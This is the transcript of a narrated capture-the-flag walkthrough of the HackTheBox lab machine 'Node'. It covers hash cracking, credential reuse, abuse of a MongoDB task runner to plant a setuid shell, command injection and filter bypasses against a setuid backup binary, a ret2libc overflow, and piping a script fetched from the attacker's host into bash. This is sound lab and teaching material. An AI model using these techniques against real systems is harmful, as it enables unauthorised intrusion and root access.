What's going on, YouTube? This is IppSec, and I'm going to be doing Node from HackTheBox. I'm going to be rushing through this box a little bit because it is Saturday at 11 a.m., which is after the time this box retired. Uh, Long story short, I thought Kotarik was retiring. It didn't. Node was retiring, so I was up until 4 a.m. today doing a video on Kotarik, not realizing that it was Node I should have been doing a video on. So, gonna rush through this machine. Thankfully, Rostating had published his write-up for it, so I learned one new method of exploiting this. I knew of two ways to do the binary at the end, but apparently there are three, so we'll be digging into all three right now, so let's jump in. To start off, we're going to do a NMAP, so I'm going to make the directory NMAP, and I'm just going to NMAP-P- to enumerate all ports, -T5 to make this go quick, -N to not do DNS, VVV to make Nmap verbose and show me ports as they come back, and the IP address of node, which is 10.10.10.58. I forgot -OA to specify the output in all formats, and I'm going to do initial, and we'll do no script, and take off this -P-. So we're not going to do all ports because I want this to be done quick. So it's going to do the top 1,000 ports, and we have that finish. So we have 22 and 3,000. So I'm going to do a -SC, -SV for default scripts, enumerate versions. We can get rid of that VVV. We can do OA. We can do this initial, and we're going to do -P 22 3000. This shouldn't take too long. While that goes, we can go to node's IP address, 10.10.10.58, port 3000. And I'd probably have to turn burp proxies off. And we get a web page. Based upon the host name, I'm going to guess this is node. This nmap has finished. We do have 3000 Node.js Express Framework, login, MySpace, MyPlace. Nothing too interesting. So I'm going to do a full port scan in the background, so nmap-p- -t5. We don't need that. -n, nmap all ports, 10.10.10.58. And we'll name this nmap. So let's look at this page. We got, well, a page, so let's GoBuster it. So opt GoBuster, GoBuster-h. We will want to do -u for URL, HTTP 10.10.10.58 port 3000, -w for the word list, so user share word list, GoBuster, and we'll do directory list lowercase 23 medium. Wildcard response found. So let's see what this is. That is odd. We don't get anything, but GoBuster says we get something. So what I'm going to do is put GoBuster through a proxy. And to do that, I'm just going to use burp and create a new listener. I'm sure there's a flag to do it in GoBuster, but I always just find this the easiest way. 1,000. Okay. Start that. And now if I go to localhost 8081, I can disable my proxy. It's going to still go through burp. So we still get that. Let's turn intercept on. And see what happens. So go to HTTP history. We're getting this file and a response is some type of troll thing. Which is interesting, because when we just used a browser to do it, we didn't get that. So set proxy back on. For this request, go, and we get a page. So looking at these two requests, the main difference is a user agent. So let's just copy this user agent over to this GoBuster, and we'll see what happens. And we get that. So there is some type of filtering being put in place to stop GoBuster from doing a enumeration. So to fix that, do the -h again, and -a is set user agent string, so we're going to be using that. -a, and we'll put that in quotes. I copied too much. -a. Go back to burp. Copy this. Paste. Intercept off, intercept on. Hit / as I went. Hopefully I didn't screw anything up. So now GoBuster is set to user agent. And it still looks like it screwed up. Let's try this again. If we do, let's see, -fw as it says, we get 200 responses back for absolutely everything. So we screwed something up. Let's go back into burp, intercept on, send the request, repeater, go. It doesn't look like it should do that. If we get a random thing, so everything is returning a page. So GoBuster isn't going to be too handy. We could use GoBuster and filter by size, but we're just going to skip over this whole GoBuster enumeration because it's giving us a lot of trouble. So let's go to proxy, target tab, go to a page, and we got a bunch of junk. Let's delete the host, kill GoBuster, and refresh the page. So we're going to use burp to spider this host, and just click yes to add it to scope. And now we don't have to use GoBuster because we already have the page. We just won't find any hidden content. So since we're not going to be using GoBuster or DurBuster to find hidden content, what I'm going to do is find the app.js, which should be in JavaScript app.js. And we're going to look at the response. So we can send this over to repeater to make it a bit bigger. But this is going to give us the routes for the web application and tell us a bunch of pages that we don't have. So we see a template URL to /parcels/admin.html. And over in our proxy, or our target tab, we don't have that under partials. So let's just go there. Looks like this function doesn't work. Only admin users have access to it, so we probably don't have permission. The next thing I want to look at is go back in repeater. We have a profile and a home. Nothing there, and we'll check out the home. Nothing there. So let's go back into the Targets tab and look at what else we have. We have API users, and we have this slash, which has, looks like, usernames and passwords. So if we click go, let's make this a bit easier to read. We can sed s new line. So we have the username, my place admin account with a password of a long string. If we echo -n on that and wc-c, we have 64 characters. So I'm not exactly sure what this is. It's an even 8, and they're all evenly divisible by 8. And all the accounts are that. So I'm going to assume it's some type of hash. We have is admin true for that my place admin account. For Tom, admin false, Mark false, Rostating false. We have a bunch of passwords and user accounts. So let's figure out what this hashing algorithm is. There are two ways we can do this. We could just go to Google and type like hash identify GitHub and use an online hash identifier. Or not online. Use a hash identifier. Or we can just go to hashes.org and submit the hashes and see if it actually cracks. I like hashes.org because they have a relatively complete or good dictionary or whatever. So we can submit up to 1,000 hashes. So let's copy them. And the final one. Let's show the algorithms have found and submit. We see it is just SHA-256 plain. And we have 3 of them. We got Manchester, SpongeBob, and Snowflake. So the my place admin, DFF, is going to be Manchester. F0 is going to be Tom's. That is SpongeBob. And the next one would be Mark. And his password is Snowflake. So since my place admin is the admin user, let's do that account. So proxy set to off. And we can log in. Let's turn Spider off for now. Or we can just have Spider don't submit forms. I hate when Spider submits forms. Let's go back to it, log in. I have the password on my clipboard, so paste that. And we'll go back here, copy the admin account, log in, and we can download the backup. So clicking download backup, we get a save prompt. Then we can just copy the backup into our node directory. If we do a file on it, we get ASCII text with very long lines. Looks like it's just base64. So base64-d, myplace.backup. We'll direct that to, I don't know exactly what that is, so I just called it unknown. If we do a file on that, we got it as a zip archive, so we'll move it to backup.zip. If we unzip it, we have a password on it. So what we can do is use fcrackzip, and we want to specify -D for dictionary, and then -P for the word list. And we can do user share word list rocku.txt. And of course, we have to specify the zip file. So it looks like magic word may be the zip password. So we'll unzip again, type magic word, and it looks like that was indeed the password. So now we have the source code to the application. So what I want to do is search for password. So I'm going to grep-r. We'll make it case insensitive for password and do dot to get everything. And it looks like we got quite a bit of junk. So just pipe that to less, and we'll go through it. We have a MongoDB thing. Bunch of stuff in JavaScript, the web page. So we got more Mongo stuff. And then junk. So let's find out where the Mongo connection is controlled. So if we look at app.js, we do have the Mongo client. And we have potentially the password. So mark and then this string. And that's going to localhost 27017. If we go back to our NMAP scan, where we scanned all ports, we only have 22 and 3000 open still. So let's just try SSHing with those credentials. So if we grep mark out of app.js, we will see 10, 10, 10, 58, I think, is the IP. We can log into the box with that password. So he reused his MongoDB password as his local user password. So I want to do a vertical split. I'm going to opt lin privesc, and do I have linen on here? Yep. So before I do that, if config ton0, get my IP address, and then we can just do python m simple http server, and we'll curl 10.10.14.3 port 8000 lin enum.sh to bash. And what we're doing here is just checking for common Privesks, see if we see anything interesting. So we can go to the top and begin searching through this. So going through this, we can see the kernel 2017, so relatively recent. Probably not going to be a kernel exploit. It's Ubuntu 16.04.3. Hostname's node. Our current user and group Merck, and we're in the group Merck. There's a connection to 10.2.0.1. I don't even know what that IP is. That's an odd IP. From Tom. We also logged in Merck. Group memberships. We have LXD. Where is that? No one. So we probably don't have that Privesc. That was on Calamity. Relaxed home directory permissions on Frank, Mark, and Tom. So probably should look into those home directories. Environment variables. Cron jobs don't look like they have anything unique. Looking at the ports, we have that high number port listening only on localhost 27017. I believe we said that was Mongo based upon the um, app.js we looked at. Processes. Let's see. We have a node scheduler running as Tom. So we probably want to look at this var schedule app.js file. The mongo config etc mongod.conf. So, and it looks like we have someone else on this 10.10.14.7 because there's a reverse shell going on. But let's take a look at that. So less var scheduler app.js, and we can see what's going on. It's authenticating to MongoDB as Merc, taking everything in the task collection, and then passing it to exec, and then deleting the task. So it looks like this scheduler will run a command once, and this exec is probably going to be a shell command. So let's take a look at that. I'm going to cat the scheduler so we can copy the password. And we want to copy this and do mongo-p because we want to specify a password -u merc. And we're going to connect to the scheduler database as indicated right there. Well, right here. Enter the password. Login failed. Oh, I copied too much. Copy too much again. If I could actually read what I was highlighting, it would be amazing. So, mongo-p-u merc scheduler, and we get connected in. So what we have to do is create a document now. So let's see, it's looping through that docs, and we're going to create one with the parameter cmd. So db.tasks. Yep. And I got tasks from this db collection. And we want create. No. Is it insert? Yes, we got an insert command. And Mongo likes everything in JSON. So insert cmd : and we want to do something like we can copy dash. So cp, let's see, locate dash. I can just do which dash, bin dash to temp IppSec, and we will chmod 6755 bin dash. And I will end that with the semicolon. That looks good. We inserted one command. So if we do db.tasks.find, we can see our command is there, and we'll give it a little bit of time to see if it executes. The reason why I use dash is because dash normally doesn't drop the set UID bits, and the set UID bit I'm doing is 6, which is both user and group. User is 4, group is 2. And I think 1 is a sticky bit, which is a bit different, but we see db.tasks doesn't have it, so I'm going to press Control D to exit, and I'm going to see if /temp IppSec is there. It is, and Tom owns it. And the reason Tom owns it is, again, from our lin enum checker. If we ps aux grep schedule, we see that Tom is running the scheduler. That's why we started looking into it. So if we just execute temp IppSec, we are now Mark. Wait, that's who we started as. That's not right. Tom owns it. It has the did not have a set UID bit on it. That's odd. I guess we'll go back in and try this again. Ver scheduler app.js mongo-u or -p-u merc scheduler. Didn't copy the password. db tasks insert cmd chmod. We'll just do it this way. And I forgot to make it JSON. db.find. task.find. Looks like it ran. ls-la temp IppSec. Sticky bit is set. ID. No. Does that have a flag? There we go. I guess I have to specify that -p flag. But now effective UID is Tom. So if we do who am I, we are now Tom. So now that we're Tom, let's go into our home directory and cd home Tom and create the SSH. Can't do that. Looking at permissions of a home directory, everything's owned by root, and we don't have write access to our home directory. What I wanted to do was just drop a SSH key so I could SSH in as Tom, but can't do that, so let's curl 10.10.14.3 8000 lin anum.sh and run this again and see if we have anything interesting. So kernel information, we looked at that. Hostname, group, path, shells. I'm just looking at the red text to see if there's anything we haven't really looked at. And I'm looking for like set UID or SUID in particular, because we haven't looked at those files yet. File locations, nothing. Let's do this manually. Find, is it -perm 4000 dev null, find slash. So we do have set UID bits on the file. I don't know why it didn't show in a Linux priv checker script or linenum. So let's check that out. Set UID, camel case, suid. Okay, found it here. So we do search for set UID files. Oh, throw equals 1. So if we go to the top, we do see options. Keywords, export, report name, and stuff. But T, include thorough lengthy tests. And if we have that option, it sets thorough equal to 1. So let's do that. Just hardcode it. The alternative would be to download the script and use the actual command line flags, but I like executing this way. So 10.10.14.3, port 8000, lin anum.sh, execute bash. So let's see what the set UID stuff looks like in this script. Home directory, there we go. We have set UID files and GUID files. So looking at these, we do have one that I don't recognize, user local bin backup. It's owned by root, and the group is admin, and admin can execute it. So we should take a look at that. We also have our shell. But let's take a look at this user local bin backup. So first, running groups. We're still in the Merc group. We have to escalate up to the whatchamacallit, admin group. So let's chmod g plus s on IppSec, and then exit /temp IppSec -p. ID didn't seem to work. Let's see. Let's remove the sticky bit, or set UID bit. I don't know why I always call it sticky. And then chmod 6755 temp IppSec. So we can set it. chown tom admin. Who am I? I am Tom. I cannot change it, even though Tom is in the member. So let's use Mongo to change that. So my effective UID is only going to be 1000. So if I do that, I don't have the group ID, so that's probably why my chmod isn't working. So let's get ver scheduler app.js mongo-p-u merc scheduler password. Do this, and then db tasks insert, because this is probably going to have all the permissions of Tom. So we want to do another CMD, and we'll do chown tom admin on temp IppSec, and then we have to chmod 6755 on temp IppSec. Oops. That should be good. db.find. Whoops. There we go. db.tasks.find. Looks like it's already ran. So lsla temp IppSec tom admin. So let's execute that with -p ID, and we're now in the admin group. So I couldn't change it to admin before because I was not in the admin group to change it to. But again, MongoDB is running natively under Tom, so he has all the group permissions set to him. But now that we have that group bit, we can now do user local bin backup. And we get nothing. Local bin backup / still nothing. -h, permission denied. Oh, when I did bash, it removed it. User local bin backup -h, still nothing. So what I'm going to do is base64, user local bin backup. I'm going to copy this. Actually, that's pretty big, so we'll just use netcat to transfer it. B boxes. This is node. Netcat lvnp. We'll listen on 8081, I guess. We'll call it backup. Or wrong direct. Already in use. That's right. Burp is using that 8082. And we'll do nc user 10.10.14.3 8082 user local bin backup. So md5 sum on backup, md5 sum user local bin backup. We have the same file, and now we can begin analyzing exactly what backup does. So let's make this executable with chmod plus x backup, and then execute it. We get absolutely nothing back. So let's run a strace on backup, and doesn't really do anything and exits gracefully. So let's analyze the assembly. So radar2 backup, analyze with AAA, print out the function list with AFL, and we can do VVV to enter visualization mode. Scroll down, so where the asterisk is equal to the sim.main, hit G twice, and then you can do spacebar to change the view, and we get into a pretty call graph. Or I think it's a flow graph, whatever this is called, we get into this function or view. And we can see that there is a jump right here, and it goes straight to an exit. And if that is not equal to 3 arguments, it looks like, it takes that path. So let's open a new pane and execute backup with 3 arguments, and we get could not open file. So let's do a system trace to see what file it is. And we see it's trying to read something in Etsy myplace keys. So if we go to our box and cat Etsy myplace keys, we get this file. So let's copy this out, go into our box, make dir Etsy myplace v Etsy myplace keys, and paste it. The next thing is something we should have done a while ago, and that is go into the app.js. So I forget exactly where this is. JS, do we have? Okay. So var dub myplace, and now we can grep-i backup, and let's do capital R for recursive. And now we're looking at how backup actually works. So in app.js, we see the function that we want. So constant backup key is equal to 45 FAC. And if we look at Etsy myplace keys, that is one of the keys. So here is the blacklist for GoBuster, Postman. I'm guessing this may be GoBuster. Oh no, there's Go. That blacklist GoBuster. Backup. And we can see the code for the backup piece now. It's going to spawn user local bin backup -q, the backup key, then the directory name. So if we go to a backup, we can do /backup -q, the key. It could probably be any one of these keys, and the directory name. So let's do /root. And I know my root directory is a lot bigger than this, so let's unzip this on base64 and see what this is. So unknown.b64, base64-d, unknown, unknown. File it. It is a zip. So let's move unknown to unknown.zip and unzip this. It's skipping something, so let's try 7-zip. And our password, probably magic word. That was the password we had before. And it decompressed it, so it looks like root.txt is in that, and we get a troll face. So that's obviously not what we're supposed to do. So let's remove unknowns and check out what is going on in this binary. So it looks like if -q is there, then this won't happen. And this is the computer graphic. And did we do that? Yes, and if we remove -q, we need 3 arguments. Then we get that computer graphic, okay? So we know what's going on right here. Scroll down. So after that computer graphic, we jump here. It's doing a bunch of things. We get a call to fopen right here. So I'm guessing this is probably where we are reading the Etsy My Place keys. Scrolling around. And this is where it starts to get interesting. And after this, we'll open up Binary Ninja because it makes it a bit easier to read. I just want to show you the free way to do it. So right here is kind of a sanitization thing. We can see Radar is being nice and telling us exactly what would be here right now. It is, I think, 2 periods. And if it's 2 periods, we go all the way over here. Come on. There we go. And it's pushing that base 64 string of that troll face. So I'm sure there's a way in Radar where we can make this print a bit nicer, but that's what's going on. And we can go down, we can see /root is also there, so we can't do bad cares /root. Let's see what else. This is a bit painful to view, but this is what you get for being free. And it's actually doing something better than what Binary Ninja would do. So we have another one, is a semicolon. And we can verify this by just saying, hey, if we do /something, target path doesn't exist. /root, it does. Root doesn't exist. We have a semicolon, bin bash. Did that actually work? I don't think it did, but it may have. There's no way. I'm going to try this real quick. Let's go over to SSH. User local bin. Backup. 1. We can do -q. Etsy, my place. Keys. Backup -q. Bin bash. Nope. Oh, I'm an idiot. That has to be in quotes. Wait. We need 3 arguments. Yeah. So what happened here is I didn't have this in comments. There we go. And that's the troll face. But we saw that because that semicolon is a bad character. Hopefully that makes sense. We also have and as a bad character. Let's see. Another bad character. And again, I'm just going through and looking at what Binary Ninja says are bad characters. And every one of these is going down to that base 64 junk. Let's see, Pipe is a bad character. Let's see. This is going to an actual memory address. That is as well. Etsy's a bad character. So, you get the gist right there. So I'm going to open up Binary Ninja, and we're going to analyze this file with that tool, because it's a bit more friendly in the video. Mainly because I know it better. As you can see, I'm having trouble even just getting out of this. Ah, there we go. Just Q. So, opt, Binary Ninja. We can open the file, and we can see this is a much more friendly input, but it's not auto-expanding some things. Like we saw a Q over here. So maybe we can edit tools, analysis module, linear sweep maybe? No. Maybe it's in a future version, I don't know. So that's the call to exit. Skip down here. Okay, this is where we have the blacklist. Because we can see, let's see, is this the first one? Could not open file, didn't say magic word, here we go. All these, if the string exists, go down here, and that's the base 64 we don't want to hit. So, zoom back in, we can see push, and then 2E is what this is pointing to. Radar was actually showing us what this was. But 2E, let's see what that is. Next to ASCII. 2E is a period. That doesn't look right. What did we say was just before /root? 2 periods. Oh, 2E, 2E, then null byte. I wasn't looking at the next string. So this is the 2 dots. We have /root here, so it detected that one. This push 3B. I'm going to guess that is a semicolon. Yes. Then we have the next one, 26. That is going to be ampersand. 60 is going to be the backtick. 24, that's going to be the $, and let's just spot check that. Yep. 7C. Then we get to the string. This is going to be /, and I'm just reading at the very beginning 2F, 2F, and then the null byte. The null byte terminates the string. So it's going to be / is a bad character. And then this. Maybe just / is a bad character. /etsy's bad. And now we're getting into the next piece where we're actually doing the backup. So just slash and slash /etc. So those are all the bad characters we have. Then now it's assembling the string, and we're calling user bin zip with the password of magic word and our user input. So if you noticed, we don't have just root. We have slash root as a bad character. So if we go back to our SSH, and I'm just doing that so I have it on my terminal, go to slash and call user local bin backup -q, copy this, and just say root, because we're at slash, and it's not changing the directory before it, so it goes where our current working directory is, and we get a bunch of base64. We can copy this. I don't know what I just clicked. My hand slipped. Copy. V test.base64. base64-d to test.zip. And then unzip test.zip. And the password is magic word. And we see it did unzip root.txt. And if we do a wc-character count on root.txt, we get 33. That's got a line break in it, so chances are that's an MD5 sum in that file. So that is the first unintended way to do this binary. There is another way, unintended method of this binary. We're going to do like 3 unintended methods and then the intended, which is a buffer overflow. So the next unintended method will be abusing wildcards. And I noticed what I did. I opened that in a new terminal window. So wildcards, if we look at our bad characters, we have slash root. But if we do like cd slash r question mark root, like that, we just go to the directory. And that only works because there's nothing else in root that has that name. So if we make directory or ppt and we try to cd to that, we get too many arguments because ls slash r question mark t oh. It's hard to just ls that directory, I realized, because ls went into 2 different ones. We have that slash root and then this slash root. So it matches 2 things. Hopefully that makes sense. So let's remove our ppt and go back to our SSH, run this command again, and we'll do slash r question mark t. That is the troll face. So I think we may have to specify the entire file. There we go. We got a different input. So if we specify the entire file, we get this. If we copy this out, zip.b64, that's a bad file name, but oh well. Zip b64 to, what do we want to call this? Root.zip. Unzip root.zip. File root.zip. ASCII text. Oh, crap. base64-d. Unzip it. Magic word. Replace. Sure. It extracted. And if we do a wc-c, we get 33 characters. Again, that's a MD5 hash because there is a line break in that file. So that is method 2. Method 3 is through command injection. So if we look, we don't have it filtering any new line characters, and it's just calling, let's see, where is it? System. So system will also allow us to do a new line to execute code. So that would look like if we had bash.sh id and then the second command. So that's how that one works. And I know we can do it through printf, but I want to try something. So let's no, I think we have to do it through that. But anyways, this is one of the famous Nagios exploits. If you look at NRPE, it was vulnerable to this. And if you haven't, I just Google like NRPE command injection vulnerability. It's like, I don't want to say 2014 maybe even older. NRPE CVE command injection. 2014. But this is the most common time I've seen this exploit against that software in particular. So to do that, we're going to look back at Binary Ninja and look at the zip function. And it's truncating that output because it's very long. And we see the full command is userbin zip -r, and we're directing it to dev null. And then again, the string terminator here. So the string is I can't highlight. Can I highlight multiple this way? No. But anyways, since it's directed to dev null, we're going to do 3 parameters, or 3 lines. So let's go back to SSH, and I'm going to try something real quick before we do it. We'll try an easy way. Just put a double quote here, and we're going to do junk, then bash, and then junk. And we did that junk at the end for the 3rd line because, again, Binary Ninja is telling us it ends it with dev null. So that's how it ends. So if we didn't add that 3rd line, that dev null would be on a bin bash. And that does work. So we don't have to do printf. We can just do it with quotes. And we are now UID as root. And we just could go to /root now and look at root.txt. If you didn't want to do it that way, you could just printf and do it this way. That should be it. Yeah, that works as well. And the reason why we didn't get a hit the blacklist because $sign is on the blacklist, but our terminal is interpreting this before we send it. And printf is just a function that we can test. New line. What? Do I need single quotes? Oh, I have print, not printf. But yeah. Printf just requires that line break and allows us to do that. If we did an echo, I don't think it obeys new line. No, it does not. So that's why I said printf earlier. So that is probably the coolest way to do the binary. And then we have method number 3, which is going to be the hardest method to do, and that is the buffer overflow. So the first step is to check what compile time instructions are, or compile time protections are enabled. So we just run checksec on it, and we see that dep is enabled and ASLR is not on this binary. So if we delete all breakpoints, okay, we don't have any. We can set a breakpoint for main, run this, and then do jump call, and see if we had any jump ESPs or got lucky there, because this binary probably isn't going to be randomized. I don't think it can be, but don't have any dangerous instructions right off the bat, so the next easiest thing is to do like a return to libc attack with brute forcing, because we have unlimited tries at this binary. I think October did this. One of my videos, early videos, did this. I want to say October, but it may have not been. But I'll put it in the description because I'm going to go a lot more into ret to libc back then than I am now. So we're kind of going to rush through this, and instead we'll look at some static analysis. So we'll go back to Binary Ninja, and let's look at a vulnerable function, strcopy. This should be strncopy, and then we're going to look at something we can recognize. So display warning, don't know where that gets displayed. Success, don't know where that gets displayed. Target, I know exactly where this is. So we're going to target this one. And we have us making space on ESP, which is the effective stack pointer, 208. Let's see, 512 is 200, so 208 would be 520. Then we're going to free up an additional few bytes and then push stuff to it. So I want to say like 508 maybe, I don't know. But between 500 and 600 we have a buffer overflow right here. So we have to figure out how to get to display target. So we can go to display target in main and see there is a function just before it. So let's run our backup script twice and see if we can get it to display what we're archiving. So cat etc myplacekeys. Okay. And then we want to call user local bin backup with -q, the key, and root. We don't get anything. cd/. We don't get much output at all. So let's remove that -q. Don't get anything. We need 3 arguments. So we'll do IppSec. I think it can be literally anything. Started archiving root. So this is where the buffer overflow is. If we go back into display target, starting archiving %n. So we can't have that -q flag there. We just have to put anything else in place. So let's go back to GDB and let us delete the breakpoint on main, and we'll do pattern create 600. Let's get rid of that. And now let's call this. So run, we'll do IppSec. The key on this I think is ABC, and paste this. And this has special characters, so we need to put this in quotes. And it never said that. Just said validating access token and encoded backup is below. But this, we just hit the bad characters. So we had one of these bad characters in our string. I don't know what it was. Maybe %. Oh, semicolon. I see a semicolon like right there. Is that the only semicolon? We have a $sign too. Glancing over this. Hopefully this doesn't screw anything up. Place those two. Still nothing. So we still have some bad character. Let's see, does pattern create have a bad character flag? It does not. So we'll just do python-c print a times 520. Python C print A times 520, and we'll see if this crashes the program. Run IppSec ABC 520 A's. We do get a seg fault, so let's change that to 510. We did crash, but we didn't fully overwrite EIP because we don't have 414141. So let's try 515. There we go. We have 3 4-1s. So if we do 516, run IppSec ABC. Now we have a full EIP overwrite. So we can print 512 A's, then 4 B's. There we go. And the last thing I want to do is I had changed my place keys to make it easier, but what we're going to do is revert that. So cat etc my place keys, and I'm just doing this in case for some reason it affects the stack. I want to make it as close to production as I can. So let's take a key. Instead of ABC, we'll put this, and we're still good. So we know at 512 A's, I should have saved that. So 512 A's equals junk. After that, bytes 513 to, was it 517 equals EIP overwrite. Okay, so we have that in our notes. So we got to make the skeleton exploit and search for all the return to libc addresses. Instead of creating a new exploit, let's just look at my October stuff. And I do have a buff.py in October. And again, this is when I did a return to libc, so we're going to use this as the skeleton exploit. So we're going to copy this over to a guy. So vi buff.py, paste this. Okay. And I am in dev shm, that's why I can write. And I'm also, can I do an nested tmux? Can't create socket, permission denied. Done. So we'll just have to hold on. Load. That's set paste. I'll paste it here so we can do stuff side by side. So the first thing I have to replace is that libc base address, and we got that by doing ldd user local bin backup and grep for libc.so.6. And that's going to change constantly because of ASLR, but 1 in like 250 times we'll get it correct. So again, if you don't know any of this, I'd recommend watching October. So the system offset, that is gotten by I think readelf again, -s, lib32, and libc.so.6, grep for system. Okay, we want this one. Cannot copy if I'm not in the window? Huh, today I learned. I need that 0x. We don't need exit, but we'll see if we can get it quickly. Exit. I think it's this one. And the argument offset, this is what bin sh is, and that's what changes a little bit. We do strings -a-t-x, lib32, libc.so.6, and we grep for bin sh. And that one is 0x 15900, just to make this pretty. I think that's right. Okay. We'll send, let's see, send 512 A's. I don't know if that's right. Trying to think real quick. If we have to go back or forward. I think that's right. So after 512 A's, we write our system address, and then we also put exit and argument. I think that's right. If not, it's 504 or something. But we'll try this. So user local bin overflow. This is now backup. And then IppSec is one argument, key is the other, and then buff. So cat etc myplace keys. Do that. I plus equals 1, fix that bug. And I guess we can try this. Do this so I can copy it. Vim buff.py read-only file. We'll call this exploit.py. Python exploit.py, and must contain only 2 arguments. So I screwed up this call. It's binary, then I guess read-only file. Sweet. I guess the umask is weird on this, or something. So, IppSec, put a space plus buff. I'm screwing up my call somehow. Not exactly sure how I'm doing this. Let's see. So I'm pretty sure I had it right the first time. You can do multiple arguments here. So let's fix this. Then we can do type buff and run this. We gotta print it. Okay, it is a string, and it's saying exec v must contain only strings. So let's verify it's still a string when it makes its way in here. Whoops. It is not. So let's see. That is odd. Let's change that back to buff. Get rid of that. And start commenting this stuff out. Okay, it likes the A's. Likes the A's plus system address. It's fine with that. If this works, I'm going to be so baffled. No. So as soon as it hits that argument, it starts having an issue. So maybe we can add trailing B's to the end of this? Nope. Huh. That's the exact same code as all the other function pointers. Guess I can add a B there. Don't think that would do it. Huh, it's working now. So one thing I want to do, whoops. No. Take that. Print after the call. Done. I was hoping I could try to get it so we can see the try number, but it doesn't look like we can because this ASCII is just too big. So at try 51. But it's going to try a few hundred times, and maybe we'll get lucky and hit the address. And hopefully that adding the B there did not fuck up everything. I don't think it did, but no clue what was happening there, to be honest. And it should hit sometime soon. We're at 127. This is the dangerous thing with brute forcing ASLR. Let's see. Did it hang? It's no longer starting archive. It died. Let's try again. And we immediately get it. That was odd. No clue what happened, but as you see, we are now root. We can go into /root, and we could also get the flag. So, hope you guys enjoyed that video. I feel like this has been a really long time. So, yep. I'll see you guys next week with, hopefully, Kodarak. If it is that box that gets retired, well, the video is done, so my week will be easy. Take care, guys. Later.